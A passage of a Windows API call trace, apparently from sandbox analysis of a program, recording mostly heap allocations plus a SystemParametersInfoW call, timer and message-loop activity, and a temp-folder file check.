[0270.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0270.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0270.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0270.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0270.543] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0270.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0270.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0270.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0270.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0270.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0270.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0270.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0270.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0270.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0270.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0270.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0270.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0270.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0270.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0270.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0270.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0270.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0270.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0270.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0270.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0270.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0270.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0270.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0270.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0270.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0270.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0270.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0270.562] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0270.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0270.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0270.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0270.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b88 [0270.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69b88, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0270.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0270.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0270.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0270.562] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0270.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0270.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0270.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0270.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0270.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0270.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0270.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0270.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0270.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0270.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0270.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0270.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0270.563] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0270.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0270.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0270.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0270.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0270.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0270.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0270.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0270.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0270.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0270.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0270.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0270.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0270.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0270.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0270.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0270.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0270.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0270.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0270.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0270.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0270.567] FreeLibrary (hLibModule=0x750c0000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0270.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0270.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0270.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0270.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0270.568] TranslateMessage (lpMsg=0x8cf708) returned 0 [0270.568] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0270.568] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0270.568] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0270.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0270.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0270.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0270.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0270.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0270.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0270.570] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0270.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0270.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0270.570] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0270.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0270.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0270.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0270.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0270.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0270.570] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0270.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0270.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0270.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0270.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0270.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0270.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0270.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0270.571] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0270.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0270.571] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0270.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0270.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0270.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0270.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 